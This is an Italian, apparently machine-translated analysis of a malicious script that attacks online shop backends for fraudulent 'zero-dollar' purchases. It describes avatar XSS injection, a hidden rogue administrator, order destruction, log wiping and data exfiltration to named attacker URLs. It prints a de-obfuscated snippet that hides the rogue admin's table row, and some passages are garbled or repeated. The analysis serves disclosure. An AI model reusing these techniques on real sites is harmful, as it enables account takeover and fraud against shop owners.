prefazione

Il motivo del recente aumento dell'intensità degli acquisti a zero dollari mirati all'eterodina è che gli autori non hanno protetto adeguatamente i loro siti web. Secondo i netizen entusiasti così come il proprio script di exploit di vulnerabilità catturato, con la presente scrittura serie di articoli di analisi. L'autore di questo articolo script di vulnerabilità, l'uso di avatar iniezione codice xss, e quindi utilizzare la paura dell'amministratore di essere violato per visualizzare i registri di sfondo della psicologica, progettato per eseguire codice maligno in questo momento, in modo da raggiungere l'uso dell'autorità dell'amministratore per raggiungere lo scopo di acquisto zero.

Il motivo del recente aumento dell'intensità degli acquisti a zero dollari che hanno come obiettivo l'eterodina è che gli autori non hanno protetto adeguatamente i loro siti web. Sulla base di netizen entusiasti e dei propri script di exploit di vulnerabilità catturati, stiamo scrivendo questa serie di articoli di analisi.
C'è da dire che non si ha paura di essere hackerati finché si hanno zero entrate giornaliere e nessuna carta.

dichiara#

Per evitare ulteriori sfruttamenti dannosi, tutti i codici e le descrizioni di questo post sono stati offuscati.

delineato#

Questo articolo vulnerabilità autore di script, l'uso di avatar iniezione codice xss, e quindi utilizzare la paura dell'amministratore di essere violato per visualizzare i registri di sfondo della psicologia, la progettazione di codice maligno in questo momento per eseguire, in modo da ottenere l'uso dell'autorità dell'amministratore per raggiungere lo scopo di acquisto zero.

dissezione del codice#

Indirizzo dello script del codice dannoso

https://jiaoben.keeta1.top/

L'ho scaricato e ho scoperto che era offuscato, una semplice de-obfuscazione.
Il processo non viene mostrato, il codice seguente viene solo decriptato a un livello leggibile per evitare lo sfruttamento.
La struttura generale è la seguente

Iniziate aggiungendo un amministratore con @admina.com!

$("td")["each"](function (_0x36ba71, _0x348775) {
	console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
  if (_0x348775["innerHTML"]["indexOf"]("@admina.com") ! = -1) {
    var _0x53991d = $(this)["parent"]();
    _0x53991d["remove"]().
  }
})

L'idea è di scorrere tutte le tabelle e, se una tabella ha un valore contenente @admina.com, rimuovere il suo elemento genitore.
Si dà il caso che l'elenco degli amministratori sia una tabella, per cui l'amministratore che contiene @admina.com può essere nascosto. Ciò significa che l'amministratore non è visibile nel backend, ma solo nel database.

Dopo aver eseguito i risultati come sopra, la gestione è sparita.
L'unico inconveniente è che la riga in basso, "Mostra record da 1 a 1, totale 1 record", dovrebbe essere ridotta di uno. Altrimenti non funziona.
E poi c'è la funzione di hackeraggio delle chiavi.

Prima di tutto, in base al titolo, determinare se l'interfaccia del registro delle operazioni di background
Verrà quindi attivato un timer per l'esecuzione del codice dannoso.
Il codice dannoso nel timer non verrà eseguito se non si trova nell'interfaccia dell'operatore di registrazione in background.

Per prima cosa richiedere la scheda per trovare l'id dell'utente con il nome utente toptoones
Quindi, in base all'id restituito, procedere come segue

Eliminare prima questo utente
Quindi chiamare il plugin Order Destruction per distruggere l'ordine dell'utente.

Se non avete installato questo plugin, questo vecchio 6 sarà anche in grado di chiamare l'API per aiutarvi a scaricare dal negozio di plugin, attivare il plugin, distruggere l'ordine, chiudere il plugin, disinstallare il plugin e, tra l'altro, aiutarvi a cancellare i registri in background.

Poi inietterà il codice dall'avatar dell'amministratore dove è scritto all'inizio che nasconde l'amministratore malintenzionato, in modo che non appena si accede al backend il codice malintenzionato venga attivato.
Quindi caricherà le vostre informazioni nel suo backend.

https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp

Poi verificherà se nel backend è presente un plugin per i pagamenti facili e, in caso affermativo, inietterà del codice. Credo che avrei dovuto provare a modificare la configurazione dei pagamenti, ma per qualche motivo non l'ho fatto e probabilmente procederò con un aggiornamento.

Gestisce con cura anche la protezione dello sfondo
Infine, c'è tutta una serie di operazioni di cancellazione dei registri e di trasferimento dei dati.

riassunti

rinunciafantasticare(Interdimensionale)
vedere la realtà
Prendete un'altra spazzola per capelli, l'autore non si è nemmeno presentato.